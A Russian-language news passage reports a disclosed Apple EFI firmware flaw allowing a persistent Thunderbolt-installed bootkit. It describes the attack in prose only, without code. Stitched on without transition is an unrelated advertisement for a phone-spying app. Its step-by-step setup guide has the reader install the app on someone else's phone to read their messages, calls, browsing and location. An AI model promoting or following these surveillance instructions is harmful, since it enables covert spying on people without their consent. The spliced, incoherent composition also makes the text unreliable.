Специалистом найдена брешь в прошивке Apple EFI

037Программистом Trammell Hudson был оформлен отчёт о найденной им ошибке. В сообщении говорится о возможности перепрошить Apple EFI таким образом, чтобы добавить дополнительный исполняемый код перед начальной загрузкой ноутбука.

Потенциально злоумышленники могут воспользоваться этим, чтобы скомпрометировать всю систему. Проблема может присутствовать в большей части Macbook, где используется Apple EFI.

Как считает специалист, устанавливаться буткит может через разъём Thunderbolt. Через этот же порт вероятно произойдёт заражение иных девайсов, которые будут подключены к инфицированному ноутбуку . Что самое опасное, буткит не получится удалить простой переустановкой операционной системы Mac Os X, равно как и сменой жёсткого диска. Прописывается код в ПЗУ, защищая свою целостность.

В автозагрузке ПЗУ можно использовать не только для исполнения нужного злоумышленнику кода, но и для отключения проверки цифровой подписи, подтверждающей лицензию на соответствующий программный продукт Apple. Если у хакера имеется физический доступ к целевой машине, для микросхемы SPI flash ROM вполне реально написать собственный код, который приведёт к созданию нового буткита под Mac.

Для сокрытия своего пребывания в системе вредоносный софт может воспользоваться SMM виртуализацией, а также целым рядом иных известных техник фоновой работы. Поскольку аппаратная и криптографическая проверка всей системы во время загрузки Mac Os X не осуществляется, это потенциально приводит к большим проблемам пользователей. Данная брешь уже не первая, обнаруженная в ПО Apple за последний год. Официальная реакция корпорации на отчёт Trammell Hudson ещё не последовала.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.